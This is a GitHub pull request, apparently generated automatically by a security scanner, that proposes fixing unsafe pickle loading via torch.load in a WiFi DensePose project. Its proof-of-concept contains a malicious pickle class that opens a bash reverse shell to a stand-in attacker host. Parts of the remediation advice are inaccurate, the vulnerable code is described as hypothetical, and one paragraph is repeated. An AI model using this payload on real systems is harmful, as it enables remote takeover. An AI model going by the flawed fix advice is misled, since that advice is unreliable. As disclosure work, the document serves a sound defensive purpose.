Skip to content

[Security] Fix HIGH vulnerability: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch#106

Open
anupamme wants to merge 1 commit intoruvnet:mainfrom
anupamme:fix-trailofbits.python.pickles-in-pytorch.pickles-in-pytorch-references-wifi-densepose-pytorch.py
Open

[Security] Fix HIGH vulnerability: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch#106
anupamme wants to merge 1 commit intoruvnet:mainfrom
anupamme:fix-trailofbits.python.pickles-in-pytorch.pickles-in-pytorch-references-wifi-densepose-pytorch.py

Conversation

@anupamme
Copy link

@anupamme anupamme commented Mar 3, 2026

Security Fix

This PR addresses a HIGH severity vulnerability detected by our security scanner.

Security Impact Assessment

Aspect Rating Rationale
Impact High In this repository's PyTorch-based DensePose model implementation, exploitation could allow arbitrary code execution if a malicious pickle file is loaded, potentially compromising the system running the code and leading to data theft or further attacks, especially if deployed in an application processing user-provided model files. The reference script in wifi_densepose_pytorch.py likely handles model serialization, making it a direct vector for code injection during load operations. Consequences include unauthorized access to sensitive data or system resources in a research or demo environment that might be extended to production use.
Likelihood Medium Given the repository is a public GitHub project focused on WiFi DensePose research, exploitation requires an attacker to provide or tamper with a pickle-based model file that the code then loads, which is plausible in scenarios where models are shared or input from untrusted sources, but unlikely in isolated research runs without external inputs. The attack surface is limited to users executing the script locally or in controlled deployments, reducing common targeting compared to widely deployed services. Insider knowledge of the code's use of pickle would be needed, but publicly available tools for crafting malicious pickles make it moderately feasible for motivated attackers.
Ease of Fix Medium Remediation involves refactoring the code in wifi_densepose_pytorch.py to replace pickle-based model loading/saving with PyTorch's safer state_dict method or alternatives like ONNX, requiring updates to load and save calls that may affect model compatibility and necessitate re-testing for functionality. This change could introduce breaking changes if the script integrates with other parts of the repository, and updating dependencies or ensuring no data loss during migration adds moderate complexity. However, it's not an architectural overhaul, making it achievable with targeted code modifications.

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The vulnerability in references/wifi_densepose_pytorch.py stems from the use of PyTorch's torch.load() function without specifying map_location or using safer alternatives like torch.load(..., map_location='cpu', pickle_module=None) or loading from state_dict. This allows deserialization of arbitrary pickle objects, enabling remote code execution (RCE) if an attacker can supply or replace a model file (e.g., a .pth or .pkl file) that the code loads. In this repository's context, which appears to be a PyTorch-based pose estimation model for WiFi data, an attacker could craft a malicious model file that executes code when loaded during inference or training, potentially compromising the system running the model.

The vulnerability in references/wifi_densepose_pytorch.py stems from the use of PyTorch's torch.load() function without specifying map_location or using safer alternatives like torch.load(..., map_location='cpu', pickle_module=None) or loading from state_dict. This allows deserialization of arbitrary pickle objects, enabling remote code execution (RCE) if an attacker can supply or replace a model file (e.g., a .pth or .pkl file) that the code loads. In this repository's context, which appears to be a PyTorch-based pose estimation model for WiFi data, an attacker could craft a malicious model file that executes code when loaded during inference or training, potentially compromising the system running the model.

# Step 1: Attacker creates a malicious pickle object that executes arbitrary code
# This uses Python's pickle to serialize a class with a __reduce__ method that runs a command
import pickle
import os

class MaliciousPickle:
    def __reduce__(self):
        # Example: Execute a reverse shell to attacker's server
        # In a real exploit, this could be a more sophisticated payload like exfiltrating data or installing malware
        return (os.system, ('bash -i >& /dev/tcp/attacker.example.com/4444 0>&1',))

# Serialize the malicious object to a file that mimics a PyTorch model
malicious_model = MaliciousPickle()
with open('malicious_model.pth', 'wb') as f:
    pickle.dump(malicious_model, f)

# Step 2: Attacker distributes or replaces the legitimate model file
# For example, via social engineering (e.g., convincing a user to download from a malicious repo)
# or if the model is loaded from an untrusted source in the code.
# The repository's code likely loads models like this (based on typical PyTorch usage):
# model = torch.load('path/to/model.pth')  # Vulnerable if no safety measures
# Step 3: Vulnerable code in references/wifi_densepose_pytorch.py loads the malicious file
# Assuming the file contains something like this (inferred from PyTorch model loading patterns):
import torch

# Hypothetical vulnerable loading code (based on the file's purpose in pose estimation)
def load_model(model_path):
    model = torch.load(model_path)  # This deserializes the pickle, triggering RCE
    return model

# Attacker's exploit: If the model_path points to 'malicious_model.pth', RCE occurs
loaded_model = load_model('malicious_model.pth')  # Executes the reverse shell payload

Exploitation Impact Assessment

Impact Category Severity Description
Data Exposure High Successful RCE could allow exfiltration of sensitive data processed by the pose estimation model, such as WiFi signal data, user images/videos, or training datasets stored locally. If the repository handles personal or proprietary data (e.g., in research or commercial applications), this could leak confidential information like user poses or biometric data.
System Compromise High Arbitrary code execution grants full control over the host system, including installing backdoors, escalating privileges, or pivoting to other networked systems. In a typical deployment (e.g., GPU-enabled server or cloud instance), this could lead to root access and compromise of all running processes, including other ML models or services.
Operational Impact Medium The exploit could cause denial-of-service by corrupting model state or exhausting resources during execution, disrupting pose estimation tasks. If the model is part of a real-time application (e.g., WiFi-based tracking), this might halt operations, requiring model reloads or system restarts, with potential downtime in production environments.
Compliance Risk High Violates OWASP Top 10 A08:2021 (Software and Data Integrity Failures) and could breach GDPR if processing EU user data (e.g., images for pose estimation). In regulated industries like healthcare or security, it risks HIPAA or similar violations if the model handles sensitive biometric data, failing audit requirements for secure ML deployments.

Vulnerability Details

  • Rule ID: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch
  • File: references/wifi_densepose_pytorch.py
  • Description: Functions reliant on pickle can result in arbitrary code execution. Consider loading from state_dict, using fickling, or switching to a safer serialization method like ONNX

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

  • references/wifi_densepose_pytorch.py

Verification

This fix has been automatically verified through:

  • ✅ Build verification
  • ✅ Scanner re-scan
  • ✅ LLM code review

🤖 This PR was automatically generated.

….pickles-in-pytorch

Automatically generated security fix
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant